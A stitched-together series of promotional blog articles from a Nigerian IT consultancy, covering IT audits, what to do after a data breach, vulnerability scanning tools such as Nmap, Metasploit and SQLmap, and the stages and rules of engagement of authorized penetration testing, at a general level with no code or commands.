Confidentiality here relates to information security and refers to protecting information from being disclosed to unauthorized persons or parties. This means that information such as personal credentials, trade secrets, bank account statements are kept confidential and protecting this information plays a major role in information security.

The fact that information is valuable only when it has not been tampered with gives way to data integrity such that information is not modified by an unauthorized party. If information is inappropriately altered, it could prove costly for example, a transaction of 1000naira can be altered to 10,000naira. Making sure data is protected from being tampered with is a core aspect of information security.

Availability here means that information is made available to authorized individuals whenever it is needed. Unfortunately, the act of denying rights to resources to rightful users has been in on the rise lately. An information systems audit will therefore ensure confidentiality of an organizations data, data integrity and availability of resources. An IT audit therefore oversees the organizations IT systems, its operations and management processes.

The reliability of data from an IT system can as well have huge impact on the financial statements of an organization. There an IT audit must be able to

  • Check for instances of excesses, gross inefficiencies, extravagance which has to do with wastage of resources in the management of IT systems
  • Ensure that there is a high level of compliance with government laws as applicable to the IT system.

Types of IT audits

Different bodies and authorities have developed their views to distinguish the types of IT audits. Goodman and Lawless have outlined three systematic approaches to perform IT audits

  • Technological Innovation Process Audit: This audit type attempts to construct a risk profile for already existing as well as new projects. It assesses the length, depth and presence of the technologies used by the company and how it relates to the relevant markets. It also looks into the way each project is organized, the structure of industry as regards its projects, products etc.
  • Technological position audit: This audit type deals with the technologies that the business has on ground and what it needs to add to it. Technologies can be categorized into
    • Base
    • Key
    • Pacing
    • Emerging
  • Innovative Comparison Audit: This audit deals with the analysis of the innovative capabilities of the organization being audited when compared to its competitors and rivals. The company’s research and development facilities as well as its track record of producing new products will be examined.

Other authorities have also categorized IT audits in 5 spectrum

  • Information Processing Facilities: It is focused on verifying the processing ability of the facility and if it is designed under normal and disruptive conditions to process applications in a timely, accurate and efficient way.
  • Systems and Applications: It is focused on verifying systems activity are controlled appropriately, efficiently and adequately in order to ensure its output at all levels are valid, reliable, and timely. This audit type forms a sub-type that focuses on business IT systems and also focuses on financial auditors.
  • Management of IT and Enterprise Architecture: IT focuses on verifying that organizational structure and procedure that ensures a controlled and efficient information processing environment is developed by the IT management.
  • Systems Development: This audit verifies the systems that are under the process of development meet the requirements and objectives of the organization. It also ensures that the systems are developed in line with generally accepted policies and standards for systems development.
  • Client/Server, Intranets, extranets and Telecommunications: This audit verifies that the controls for telecommunications are in place both the client and the server ends as well as the network that connects both the clients and servers.

Types of Auditors

  • Internal Auditor: This auditor usually performs internal accounts auditing as well as IS audits.
  • External Auditor: This auditor reviews the findings and inputs, processes and outputs of the information systems made by the internal auditor.

Types of Audits

  • Internal Audits: As explained above, an internal audit considers all the potential controls and hazards in an information system. It takes care if issues like operations, data, data integrity, security, privacy, software applications, productivity, expenditures, cost control and budgets. The auditor works with guidelines such as Information systems audit and control association which are available to make their job patterned.
  • External Audits: This audits buttresses on information obtained from internal audits on information systems. External audit is performed by an certified information systems audit expert.

IT Audit Strategies

  1. We’ll discuss two areas here but first one must be able to determine if it is a compliance or substantive testing. The next thing to consider is how to go about gathering evidences to enable one perform application audits and make reports to the management.

What is substantive and Compliance Testing?

  • Compliance testing involves gathering evidence to test if an organization is following the control procedures. For example, If an organization has a control procedure that says all application changes have to pass through a change control, an IT auditor will have to get the current running configurations of the router as well as the configuration file. After he does this, he can then run a file to compare the differences and use the result of the differences to look for a supporting change control documentation.

  • Substantive Testing involves gathering evidence that enables one evaluate the data integrity of individual data and other information. For example, If an organization has a policy that has to do with backup tapes in storage locations offsite which includes three generations (Grandfather, father and son), then the IS auditor has to take physical inventory of the tapes in an offsite storage location as well. After this he can then compare it with the organizations inventory and also making sure the three generations are involved and are available at the time of the audit.
  1. The thing to discuss on is How to get the evidence that can help you audit the application and deliver a report to management. A few things you can review are;
  • Review the IT organizational structure
  • Review the IT policies and procedures
  • Review the IT standards
  • Review the IT documentations
  • Review the organizations BIA
  • Take time to interview employees
  • Observe the employee’s performance
  • Test controls and examine necessary incorporated entities
  1. Draft out a set of questionnaires
  • Whether there is a thorough documentation of approved IS audit guideline?
  • Whether IS audit guidelines are consistent with the security policy?
  • Whether responsibilities for the IT audit has been assigned to a separate unit that is independent of  the IT department?
  • Whether periodic external IS audit is carried out?
  • Whether independent security audit is conducted periodically?
  • Whether contingency planning, insurance of assets, data integrity etc. are made part of External audit?
  • Whether vulnerability and penetration testing were made part of external audit?
  • Whether the major concerns brought out by previous Audit Reports have been highlighted and brought to the notice of the Top Management?
  • Whether necessary corrective action has been taken to the satisfaction of the Management?
  • Whether the facilities for conducting trainings which will enable IS audit teams to conduct the audit process effectively?
  • Whether IS audit team is encouraged to keep themselves updated?
  • Whether IS auditors exchange their views and share their experiences internally?

Operations is modern organizations  are increasing dependent on IT, this is why IT audits are used to make sure that all information-related controls and methods are functioning properly. Most of all the companies if not all are IT driven and not enough awareness has been made on auditing of IT infrastructure the reason for this write up. If you’re in search of a professional firm to audit your organization, look no more as soutech web consults which is the number one IT consulting firms offers in Nigeria offers this service. Subscribe to us for your auditing and all types of IT-related issues.

 

Has your account just been hacked? Wondering what to do next?

Just recently it was in the news that over 7million Dropbox usernames and passwords were being stolen with initial reports that the Dropbox server itself was hacked. The company made this statement on their blog as quoted “The usernames and passwords and passwords that are referenced in these articles were stolen from unrelated services and not Dropbox. Attackers however, went further more to use the stolen credentials to attempt log in into our websites across the internet, including Dropbox”.

Stories and news of data and network breaches in organizational networks have become trending on every headline recently so regardless of where the loopholes are, it is something we hear frequently. So many highly profiled businesses that we interact with regularly such as restaurants, product retailers have had POS (Point of Sale) data breaches over the past months.

However, I will tell you a few tips on how to approach a data breach situation and some things you can put in place in case you’re faced by such situations.

What to do Immediately- First Things First

  • First of all, try to determine the form of data breach that your information has been involved in. If it is an online data breach, then there is a possibility that your username and password might have been stolen, and if it is a POS data breach then it means your credit card numbers have been stolen as well.

  • Now if it is a POS data breach from a product outlet or a store, a restaurant that you have just purchased something with, then immediately check your credit card credentials and bank details for any suspicious activity.
  • Lookout for any alerts from the vendors that you use such that immediately a vulnerable vendor has contacted customers of password change, the user should do so too.
  • Avoid any potential phishing email or emails that require you update your password and private information via email. One tip you should always look out for is to check the email id or web address to confirm it is the official email or web address of your financial institution.
  • You can also change your other passwords if you use the same password over several accounts particularly the ones linked to your email account and those that contain your private and financial information. I advise you to go through you bank and credit card accounts as well.
  • Always notify you financial institution whenever you receive any suspicious activity going on as regards your financial account. Make sure you let them know the breached institution which your credit was used. They can take immediate action by blocking any transaction to that account.

 Meanwhile in the Interim

  • Continue to keep a close eye on you bank or financial accounts. You could also subscribe for receiving transaction alerts via text and emails. It is policy now for every bank provide these services. Sometimes it may seem that you are now safe but a cybercriminal has patience has a key virtue and therefore may take months to make use of your stolen bank and financial information.
  • You might as well contact the company which the data breach occurred when you did your transaction. They can provide you with information as regards the type of information that was leaked and the policies they have put in place to keep your personal details protected.

In the Long run

  • A lot of businesses or organisations have developed a policy such that any customer that gets affected by a data breach is given a free year of data monitoring. You can also find out with the organisation if they have such policies or if they such services.
  • I still lay emphasis on the use of a secure password coupled with a two-factor authentication as explained in my previous articles to be a key online safety means.

Data breaches however continue to be most frequent incidents these days like I said, there are ways to stay alert and be protected at all times. Luckily, if there are purchases you have made, there are anti-fraud laws in place to ensure your safety. If you find yourself in the clutch of any of the data breaches, be diligent enough to monitor your accounts. Soutech web consultants are just the right professionals to handle to fears. If you in anyway become a victim of sort, you can contact us at SOUTECH. Also, if you take all the methods and tips mentioned in this article and as long as you report any suspicious fraudulent activity then you are just as well informed as ever.

 

Network Penetration Testing Services: Tools and Methodologies

In my previous articles, I have discussed intensively on vulnerability analysis and penetration testing but I’ll reiterate a few things to help buttress the points in this article.

Penetration plays a major role in the playbook of any security consultant and penetration test and it is the best clue to know how vulnerable a network is to an attack. Compliances such as PCI and HIPAA require vulnerability assessment and they also enable penetration testing to be performed smartly and in a targeted form when compared to performing simple port scans. Vulnerability assessments most importantly is the bedrock for developing an information security program that is proactive, going beyond reactive techniques such as starting firewalls and identifying loopholes and making attempts to seal them. But know this, that when installing and managing your websites and networks even if you might know much about the basic security measures and even follow them, it is never enough to discover and mitigate all the vulnerabilities by yourself.

Now lets us understand what a network vulnerability assessment is as an entity of penetration testing. A network penetration testing is a penetration testing technique that involves reviewing and analyzing a network in order to discover any possible security loopholes and vulnerabilities. Network administrators and network security staff use this technique to do a thorough evaluation of their security architecture as well as to defend the computer network against any form of threats and vulnerabilities. It also helps them to assess the network to know its strength. But the key objective of this technique generally is to discover vulnerabilities that may compromise the overall privacy, security and operations of a computer network.

Network penetration testing Methodology

 

1. Data and Information gathering and project set up

This involves;

  • Reviewing the project to obtain all assumptions
  • Listing and detailing out the IP scanned IP addresses
  • Configuring the IDS and IPSes to accept the originating IP addresses
  • An optional scan of all user credentials
  • Obtaining contact information for both parties
  • Planning the scans and including the time it is being performed

2. Scanning the tools being setup

This step involves configuring all the vulnerability scanning tools for “safemode”

3. Performing the vulnerability scan

This involves performing and in-depth scan of all provided IP addresses and identifying any security weaknesses and vulnerabilities on user credentials after they have been scanned.

4. Research and Verification of vulnerabilities

This involves

  • Verifying all the discovered vulnerabilities
  • Identifying false positives
  • Determining any potential impacts of the vulnerabilities being exploited
  • Prioritizing remediation efforts
  • Developing specific plans and recommendations for the remediation

5. Create reports and a project close-out

This involves;

  • Delivering final and concluding reports
  • Teleconferencing of the scheduled project conclusions
  • Ensuring a full understanding of the remediation actions being recommended
  • Facilitating knowledge transfer in and effective form

Network Vulnerability Assessment Tools

In order to carry out an automates security audit in any organization, vulnerability scanners play a very critical role. This is because they can scan the website, network and other internal systems for thousands of security risks and can automatically prioritize them alongside the right patches. Some can automatically perform the patches.

Scanning websites is an entirely different ballgame from network scans. In the case of websites, the scope of the scan ranges from Layer 2 to 7, considering the intrusiveness of the latest vulnerabilities. The correct approach for scanning websites starts from Web-level access, right up to scanning all back-end components such as databases. While most Web security scanners are automated, there could be a need for manual scripting, based on the situation.

1.OpenVas: This is a short for Open Vulnerability Assessment System and is a free network security tool that has most if its components licensed under GNU General Public License (GNL). This tools is very effective in scanning for thousands of vulnerabilities and supports concurrent and scheduled scans and tasks. Its main component is available as Linux packages and as virtual appliances that are downloadable for the purpose of testing and evaluation. OpenVas does not work on windows but it offers clients for windows platforms. It can run mainly on Linux platforms and can perform scans and receive over 33,000 updates daily of Network vulnerability tests.

OpenVas has a manager that controls its intelligence and it is command line based with full services of daemon for user management and feed management. It is not easy and quick to be installed but it has one of the richest features in It security scan.

2. Retina CS Community: This is a vulnerability scanning and patching tool for Microsoft and most third-party applications like Firefox, adobe etc. It can scan for vulnerabilities in mobile devices, virtualized applications, servers, web applications, and private clouds as well. It identifies missing patches and configuration issues. It has a software that which is called Retina Network Community which is to be installed first before actually installing the Retina Cs Community software. It works on windows server 2008 or later versions, Microsoft SQL 2008 version or its later versions and it also requires a .net framework 3.5 to be installed, it is IIS server enabled.

It gives you the option of choosing from a variety of scans with reporting templates which can specify IP address ranges. You could also provide any necessary credentials for scanned assets which may be required may make your reports come out in a readily and organized format including email alerts. Most businesses however may find its system requirements very stringent since it requires windows server.

3. Microsoft Baseline Security Analyzer (MBSA): This is a tool that can perform both local and remote scans on windows servers and desktop. These tools are very efficient because it can identify missing service packs, security patches and any common security misconfiguration. Platforms that support it are windows XP Windows 8 and 8.1, windows Server 2012 and windows server 2012 R2. It is an easy-to-understand tool and a straightforward tool as well. It provides options of selecting a single window machine to perform a scan where you can choose a name, specify IP addresses and even choose a domain. You could choose the platform you want to scan which can either be a Windows, IIS, SQL admin vulnerability, windows update or weak passwords.

5. SecureCheq: This is a tool that can perform local scans on both windows desktops and servers and is capable of identifying many insecure advanced windows settings such as COBIT, ISO, CIS standards. It deals majorly on common configuration errors which are related to OS hardening, communication security, data protection issues, audit logs and user account activities. Its free version can only perform less than 24 scans which is about a quarter of what its full version scans. SecureCheq is a simple tool which lists all the checked settings including passed or failed results. Even though it is easy to use and its ability to scan for advanced configuration settings, it cannot reach deep to scan general windows vulnerabilities and network based threats. But it however complements MBSA well enough by scanning for basic threats and performing a follow up scan using securecheq.

6. Qualys freeScan: This tool can perform about 10 free scans of URLs and IPs of local servers and machines on the internet. It can be downloaded from web portals which can be installed and run on virtual machines for scanning internal networks. It can scan for issues in SSL, and vulnerabilities in their related networks.

It may seem first see an online tool which appears to do scan via internet if you put in the local IP address, it prompts you to download to your system via virtual machines like VMware or VirtualBox image. This tool allows you to scan local networks and gives an interactive report of the threats and patches.

7. Wireshark: Wireshark, previously called Ethereal, is one of the most popularly used tools for network vulnerability testing or assessment. This is because it gives you a clear picture of happenings on your network. It works in promiscuous mode in order to capture all the traffic on a TCP broadcast domain. It has features of customized filters that can be configured to intercept specific traffic such as communication between two IP addresses, UDP-based DNS queries on that network.

Data obtained can be dumped into a capture file for later review. It can also look for stray IP addresses, unnecessary packet drops spoofed data packets and any suspicious single IP address. Although wireshark gives one a clearer and broader picture of the network activities, it however does not have its own intelligence and should therefore be used as a data provider.

8. Nmap: This has remained one of the most popular scanning tools for over a decade now. It has the capability of crafting data packets and perform scanning to a TCP granular level such as ACK, SYN scans etc. some of the characteristic of this tool include

  • Algorithms for built-in signatures designed to guess OSes and its versions based on the TCP handshake
  • It can detect remote devices on the network as well as firewalls, routers, and their models
  • It can check for open and running ports and which ports can be exploited for simulation of attacks
  • It gives results in plain text and verbose
  • It is scripted to automate routine task and obtain evidence for audit reports

9. Metasploit: Metasploit is a tool that comes to play after scanning and sniffing have been done. It provides the following capabilities;

  • It is a rigorous tool for performing scans against a set of IP addresses.
  • It can be used for anti-forensics
  • Programmers can write codes that can be used to exploit vulnerabilities and to test it on Metasploit if its working
  • It is a commercially available tool for performing virus attacks.

10. Aircrack: This is a network scanning tool that acts as a sniffer, packet crafter and decoder. It targets a wireless network by subjecting a packet traffic to capture vital information about a certain underlying encryption. A Decryptor is then used to perform a brute-force on the captured file to find passwords. Aircrack can be found in kali-linux which is the most preferable.

11. Nikto: This is an interactive open source tool for scanning websites because it supports HTTPS and HTTP. Nikto works by

  • Crawling a website like a human would do in a little amount of time
  • It uses a technique known as mutation to create combinations of various HTTP tests to perform an attack.
  • It finds critical loopholes like improper cookie handlings, XXL errors, upload misconfigurations etc.
  • It dumps all the findings in a verbose mode which can also help in knowing more about vulnerabilities in a website.

Care should be applied when interpreting Nikto logs because it can result in too many things getting noticed and can trigger a false alarm.

12. Samurai framework: It is used to for deep-diving after a baseline check has been done by Nikto. It is a powerful scanning utility which can be used to target specific set of vulnerabilities. It is pure penetration testing tool which focuses on other penetration tools such as WebScarab for HTTP mapping.

13. SQLmap: This tool is a first-generation tool capable of exploiting SQL injection errors but it can as well take over the database server. It works for speedy fingerprinting of the database to find underlying OSes and file system to fetch data from the server.

Note that a regular scheduled network vulnerability scan can help an organization to identify loopholes and weaknesses in a network even before any cybercriminal can perform a seeming attack. The aim of performing a network vulnerability is to identify devices on your network without compromising the systems on your network. Therefore, ensure to conduct a periodic network vulnerability scan on your network in order to discover and mitigate and possible weaknesses on you network before it can be exploited.

Why do you need the services of a Network Penetration Tester?

A network penetration tester is specially and specifically with trained the expertise to effectively conduct penetration testing and network assessments. Note that is a penetration is improperly conducted, it could be detrimental to your organization and its daily operations. Some of the skills a Network security specializes in are;

  • Data breach prevention
  • Application security
  • Security control testing
  • Gap analysis maintenance
  • Compliance testing and analysis

Who do you contact?

To get a range of services ranging from certifications and trainings in vulnerability and penetration testing and many more courses. We at Soutech web consults have a team of professionals that cannot only train you and your staff on vulnerability and penetration testing which is an entity of cyber security but also conduct them. Endeavour to visit us at soutech web consults or subscribe to our website to find out we can help your organization and your business mitigate any form network vulnerabilities by just implementing any of our test processes and technologies.

All you need to know about Penetration Testing: Soutech Ventures

Penetration which is colloquially referred to as pen test is a simulated attack that is being performed on a computer system or its network infrastructure with permissions from management to probe for security vulnerabilities, and a potential means of gaining access to data and other features on the system.

Penetration testing helps one to find out the vulnerability of a system to an attack and if the defense mechanism created are sufficient and which defense mechanisms or techniques employed that can be defeated. A typical penetration testing process focuses on finding vulnerabilities depending on the nature of the approved activity for a given engagement.

A security testing will never prove the absence of security flaws in a system but it can sure prove their presence.

 Brief History of Penetration Testing

In the mid-1960s, for over 50years and more, as the sophistication of networks increased, white hat hackers have been putting in work to make sure computer systems are protected from unauthorized access by hackers. They understood if hackers gain access into their systems, they could even destroy information networks asides stealing information. As computers began to gain the ability to share data or information through and across communication lines, the challenge to protect information increased. These lines if broken and data compromised, contained or stolen.

As early as 1965, computer security experts warned the government and business outlets that because of the increasing capability of computers to share information and exchange vital data across communication lines, there could be an inevitable attempt to penetrate those communication lines during exchange of data. In the year 1967, in the annual joint computer conference which had over 15,000 cyber security experts in attendance, there were serious deliberations that computer communication lines could be penetrated by hackers. They coined the term penetration which has perhaps become a major challenge in computer communication today.

This meeting brought the idea of actually testing systems and networks to ensure that integrity is increased as the expansion of computer networks such RAND corporation which first discovered a major threat to internet communications. The RAND Corporation aliased with the Advance Research Projects Agency (ARPA) located in the US to produce a report known as The Willis Report named after its lead author. The Willis Report discussed this security issue with a proposition of policies to serve as countermeasures in security breaches.

From this report however, the government and organizations started to form teams with the sole responsibility of finding weaknesses and vulnerabilities in the computer networks and measures to protect the systems from unauthorized or unethical hacking or penetration.

Today, there are numerous and specialized options that are available for performing penetration testing. Many of these systems include tools that a range of features for testing the security of the operating system. For example, we have Kali Linux which can be used for performing penetration testing and digital forensics. Also contained in it are 8 standard tools such as burp suite, Nmap, Aircrack-ng, Kismet, Wireshark, the Metasploit framework and John the Ripper. Kali Linux has all these tools and many more and for a system to contain all this sophisticated tools goes to show how much sophisticated today’s technology has gradually become and how many hackers are finding ways to create problems for computer-driven networks and computing environments most the especially the internet.

Objectives of Penetration Testing

The objectives of an intense pen test involve

  • Determining how an attacker can find any loopholes to unlawfully gain access to the systems assets that can be of harm to the fundamental security of the systems logs, files.
  • Confirming that all the applicable controls like the vulnerability management methodologies and segmentation required for the good functioning of the system are in place

Types of Penetration Testing

  1. Black box penetration testing: Also referred to as blind testing. Here, the client does not give out any prior information of the system architecture to the pen tester. It may offer little as regards value to the pen tester since the client does not provide any information. It can require more money, more time as well as resources to carryout
  2. White box penetration testing: Also known as Here, the client provides the pen tester with a comprehensive and complete detail of the network and how is being applied.
  3. Grey box penetration testing: The client may provide incomplete or partial information of the system network.

Stages of Penetration Testing

There are basically 5 stages of a penetration test.

1. Reconnaissance and planning: This stage involves gathering intelligence such as network, mail servers and domain names in the bid to understand how the target system works and the potential vulnerabilities it is facing.

It also involves a thorough definition of the scope and the goals of the penetration test, including the systems that are to be addressed and the methods of testing to deployed.

2. Scanning: This stage requires an in-depth understanding of how the target applications will respond to any attempt of intrusion. Scanning can be performed in the following ways:

  • Static analysis: This is a process involves a careful inspection of the codes in the application and how it behaves when it is run. These tools have the capability of scanning the entire code in a single pass.
  • Dynamic Analysis: It involves a careful inspection of the codes in the application when in the running state. It is a more practical approach to scanning in that it gives the real-time view of the applications performance.

3. Gaining Access: In this stage, the pen tester uses web application attack techniques such as SQLs, XXLs and backdoors to unravel the vulnerabilities on the target system. In a quest to understand the damages they can cause on the target, the tester will try to exploit the vulnerabilities discovered by intercepting traffic, stealing data and escalating privileges etc.

4. Maintaining Access: The stage aims at achieving a persistent presence in the exploited system using the known vulnerabilities. Advanced threats which are capable of remaining on the system for months are logged into the system into to monitor changes, enhancements and any new information being loaded onto the system.

5. Results and Analysis: In this stage, all the results obtained from the penetration test are compiled comprehensively and in details. This includes;

  • All the vulnerabilities that have been exploited
  • All sensitive data that has been accessed
  • The amount of time spent during maintaining access without being detected.

The security personnel then analyses the results in a bid to where necessary reconfigure the organization’s WAF settings and any other application security flaws. This is done to patch all the vulnerabilities and to protect information against any future attacks.

Classification of Penetration Testing

1. External Penetration Testing: An external penetration tests is targeted at the assets owned by an organization that are accessible to and on the internet. Examples of such assets can be,

  • The organizations website
  • Domain name servers
  • Emails
  • Web applications

The major goal of the external pen test is to gain access and extract data.

2. Internal Penetration Testing: It attempts to mimic an attacker actually launching an attack on the network to find vulnerabilities or loopholes.

It involves an examination of the IT systems of an internal network for possible traces of vulnerabilities which can affect the confidentiality, integrity and availability, and thereby giving the organisation the clues to take steps to address such vulnerabilities.

Penetration Testing Services

I will describe 4 distinct penetration testing service offerings that we can provide you

  1. Vulnerability Scanning: This scanning technique provides a very transparent and mature offer but the biggest challenge always lies on whether to resell a service offering or to buy that can be used to internally scan the clients systems and networks. Every regulation requires scanning which is the first and easy step taken towards achieving security assurance. This is because all regulated customers need to scan.
  2. Penetration testing of Infrastructure: This offers tools such as Metasploit or Core Impact, that can be used to perform live exploits. Live ammunitions are used so you have to orchestrate or organize the test with the client in such a way that the amount of disruption during the tests is minimized. The pen tester should endeavor to test all externally visible IP addresses because it is what the bad guys want in order to penetrate the system and network. The tester should also attach to the conference room network which is one of the softest parts of the customers’ defense.
  3. Penetration of Applications: This is a very important step which involves an attempt to break into the applications because so many attacks are directly targeted at applications. Web applications such as HP’s WebInspect and IBM’s AppScan can be employed, but the tester can also find ways to exploit the application logic errors. Nothing stands a skilled application test because once an initial application is compromised, a direct access to the database where valuable data is easy. If the tester can access the database, then the customers system is owned already and scripts can be written to block every loop holes by the attacker.
  4. User Testing: This part of the penetration test is always fun for the penetration testers because they get to see how gullible and vulnerable most users are. The test may involve sending fake email messages to customer service representatives in a bid to gather information that can be used to penetrate their facilities. They even drop thumb drives at the parking lot and watch out for people that will plug them. Social engineering is one of the key ways of information gathering and should never be underestimated. Social engineering can be used on the client in order to catch them off guard.

Standards for Penetration Testing Methodologies

There are many accepted industry methodologies that may guide and help the pen tester through any test.

  • Open Source Security Testing Methodology Manual (OSSTMM)
  • OWASP Testing Guide
  • The National Institute of Standards and Technology (NIST)
  • Penetration Testing Execution Standard
  • Penetration Testing Framework

These frameworks have set standards that any penetration testing activity should follow as should strictly be adhered to guide the pen tester whenever necessary.

A typical penetration activity is detailed and must be carried out in an organized fashion. This is because organisational data and assets are very important and delicate things to handle therefore there is a need to have an orgnised team of professionals to handle your penetration testing services.

We at SOUTECH web consults are the perfect consulting firm for carrying out your penetration testing. We have professional staff and a team to conduct a well detailed and professional penetration testing. Subscribe for our services today.

 

Performing a Detailed Penetration Testing: Soutech Ventures

Pen tests as we already know are intended to identify and confirm actual security breaches and to report such issues to management. This ensures that an organization experiences a balance in business and a good network security to ensure the smooth operation of business.

Just to reiterate as this is a follow up article to my basics on penetration testing, penetration testing colloquially called pen test refers to an ethical hacking method which is used to perform security testing on a computer network of an organization. It involves a lot of methodologies which I have already explained in my previous write up which is designed to explore a network for potential known vulnerabilities and to test them if they are real. A properly performed penetration test allows a network professional to fix issues within the network in order to improve the network security and provide the needed protection for the entire network against future cyber-attacks and intrusions.

The terms vulnerability assessment and penetration testing are often confused and I have made an attempt to differentiate them because they mean different things.

Pen tests involve methods require using legal permissions to exploit the network while vulnerability assessment requires evaluating the network, its systems and services for potential security problems. While a pen test is designed to perform simulated attacks, vulnerability assessments only require pure analysis and vetting of an organizations network for vulnerabilities. Note that no attack is launched.

Penetration Testing Services

I will describe 4 distinct penetration testing service offerings that we can provide you

1.Vulnerability Scanning: This scanning technique provides a very transparent and mature offer but the biggest challenge always lies on whether to resell a service offering or to buy that can be used to internally scan the clients’ systems and networks. Every regulation requires scanning which is the first and easy step taken towards achieving security assurance. This is because all regulated customers need to scan.

2. Penetration testing of Infrastructure: This offers tools such as Metasploit or Core Impact, that can be used to perform live exploits. Live ammunitions are used so you have to orchestrate or organize the test with the client in such a way that the amount of disruption during the tests is minimized. The pen tester should endeavor to test all externally visible IP addresses because it is what the bad guys want in order to penetrate the system and network. The tester should also attach to the conference room network which is one of the softest parts of the customers’ defense.

3. Penetration of Applications: This is a very important step which involves an attempt to break into the applications because so many attacks are directly targeted at applications. Web applications such as HP’s WebInspect and IBM’s AppScan can be employed, but the tester can also find ways to exploit the application logic errors. Nothing stands a skilled application test because once an initial application is compromised, a direct access to the database where valuable data is easy. If the tester can access the database, then the customers system is owned already and scripts can be written to block every loop holes by the attacker.

4. User Testing: This part of the penetration test is always fun for the penetration testers because they get to see how gullible and vulnerable most users are. The test may involve sending fake email messages to customer service representatives in a bid to gather information that can be used to penetrate their facilities. They even drop thumb drives at the parking lot and watch out for people that will plug them. Social engineering is one of the key ways of information gathering and should never be underestimated. Social engineering can be used on the client in order to catch them off guard.

 

The Qualifications of a Penetration Tester

The task of penetration testing can be performed by a qualified third-party agent as long as they are organizationally independent. What I mean is that they must be organizationally separate from the management of the client or the target system. Example, if we use a case study of a PCI DSS company as our assessment entity and as the third-party company carrying out the assessment, they cannot conduct the pen test because they’re involved in the installation, maintenance or as support to the target systems.

The following guidelines can be useful in your choice for a good and qualified penetration tester

Certifications for a penetration tester: The certifications which a penetration tester hold is a very indicative guide to their level of competence and skill. While these certifications may not be required, they can indicate a common body of knowledge for the tester. These are the few among’st many certifications a penetration tester can have;

  • Certified Ethical Hacker (CEH)
  • Offensive Security Certified Professional (OSCP)
  • Global Information Assurance Certification (GIAC)
  • Computer Information System Security Professional (CISSP)
  • GIAC Certified Penetration tester (GPEN)
  • EC-Council Security Analyst (ECSA)
  • Licensed Penetration Tester (LPT)
  • GIAC Exploit Researcher and Advanced Penetration tester (GXPN)

Always remember that before any test begins, all parties are recommended to be involved such as the organization, pen tester, the assessor where applicable. They all must be aware of the types of test being performed i.e. external, internal, network layer or application and how the test will be performed and the target.

Steps to Perform a Detailed Penetration Testing

1.Scoping of the organization: The responsibility of the organization is to the adequately define the critical systems. The normal recommendation is that the organization works hand in hand with the pen tester whenever it is applicable. The assessor also plays major role here to verify that none of the components are overlooked and also to determine if there are additional systems to include in the scope. The scope of the penetration test should include the critical systems, the access points and the methods for segmentation.

2. Documentation: All components within the scope of the documentation should be made available to the tester whenever necessary. Documents include,

  • Application interface documentation
  • Guides to the implementation

This will help the tester to understand the functionality of the system. Other information which the organization needs to supply the tester should include

  • Network diagram. showing all the network segments.
  • Data flow diagram
  • Detailed list of all services and ports that are being exposed to the perimeter.
  • List of the network segments in isolation

A typical network diagram showing      the  network architecture

 

The pen tester uses all this information to assess and identify all unexpected attack vectors and any insufficient authentication controls.

3. Rules of Engagement: Before any test begins, it is very important to agree and document on conditions and terms in which the test is being performed and the extent to the level of exploitation. This gives the pen tester the authority to the test environment and to make sure the organization has an understanding of test and what to expect from it. The following are what to consider as rules of engagement

  • Window time will the test be performed?
  • What are the known issues in the system and issues with automated scanning? And if so, will such systems still be tested?
  • Any preferred methods of communication about the scope and any issues that will be encountered in the course of the test.
  • Any security controls could detect the testing?
  • Are there passwords or any sensitive data to be exposed during the test.
  • If the equipment to be used by the tester will pose any threats to the systems in the organization.
  • Any updated OSes, service packs and patches and if the tester should provide all the IP addresses for which the test will originate.
  • What steps the tester should take when he detects any flaw or loophole.
  • Will the tester retain any data obtained during the tester?

4. Third-party Hosted/Cloud environments: The following should be added to the rules of engagement.

  • Before test commences, if the service-level agreement requires any approval from the third-party.
  • Web management portals that are provided to manage the infrastructure by the third-party should not be included unless noted in the scope.

5. Criteria for success: Pen testing is supposed to simulate a real-world attack with the aim of identifying the extent an attacker can go to penetrate the systems. Therefore, defining the success criteria for the pen test will allow the entity to program limits for the pen test. Success criteria should be included in the rules of engagement and should include

  • Restricted services or data should be directly observed in the absence of access controls
  • Level of compromise of the domain being used by legitimate users.

6. Review of past vulnerabilities and threats: this involves a review and a consideration of all the threats and vulnerabilities that were encountered in the last 12 months. It is more like an historical look into the organizations environment since the last assessment was performed. This information is very important to give insights on how to handle the current vulnerabilities. Depending on whether it is a white box, grey box or black box test that is to be performed, these are not to be included in the review.

  • Vulnerabilities being discovered by the organization and have not be solved within a certain time.
  • Compensation controls preventing the discovered vulnerabilities
  • Upgrades or deployments that are in progress
  • Threats and vulnerabilities that have led to a possible data breach
  • Valid remediation of pen test in the past years.

7. Segmentation: This is done by conducting test used during the initial stage of the network penetration such as port scans, host discovery. It is performed to verify that all the isolated LANs do not have access to the database. Testing each of these unique segments should ensure that security controls are working normally as intended. The pen tester should check the LAN segments that they have access to the organization and restrict access.

8. Post Exploitation: This means taking actions after an initial compromise of the system. It refers to the methodical approach of making use of pivoting techniques and privilege escalation to establish a new source of attack. This can be done from a vintage point in the system in order to gain access to the network resources.

9. Post- Engagement: the following activities should be done after the engagement or testing are being performed:

  • Remediation best practices
  • Retesting all the identified vulnerabilities

10. Cleaning up of the work Environment: After the pen test has been performed, it is necessary to do a thorough cleanup of the working environment. The tester does some documentation and informs the organization of any alterations that have been made to the environment. These include but not limited:

  • Installed tools by the tester on the organizations system
  • Created accounts during part of the assessment
  • Changed passwords for accounts
  • Any additional documents not related to the organization

11. Reporting and Documentation: Report helps an organization in their efforts to improve upon their security posture and also to identify any areas that are vulnerable to threats. A report should be structured in a such a way that it the test is clearly communicated, how it was carried out. The report should be done in the following steps;

  • Report identified vulnerabilities
  • Any firewall mis-configurations
  • Report of detected credentials that were obtained through manipulation of the web application.The service of penetration testing is a typical learning experience for everyone in the organization that is involved in it as well as the tester. The testers get to discover and learn what it is that works and what does not work and is not obtainable to the entity being tested. They can also learn how to find ways to adapt to the defenses of the customer. The client i.e the organization gets to learn of what they should have known and done that is less effective and finally learn and appreciate what is applicable. The pen tester now tries to pick the pieces and build a strong and long-term relationship with the client.

We at soutech web consults are the perfect consulting firm for carrying out your penetration testing. We have professional staff and team to conduct a well detailed and professional penetration testing. Subscribe for our services today.

 

 

 

Why do you need a Vulnerability Test? Concepts and Methodologies

First of all, let us understand what a vulnerability is. I’ll define a vulnerability as any form of loophole, a weakness or mistake that can be found in a system security design, its implementation, security procedures, or its control that can lead to systems security policy violation. A vulnerability can make it possible for cybercriminal or attacker to gain unauthorized access to the system.

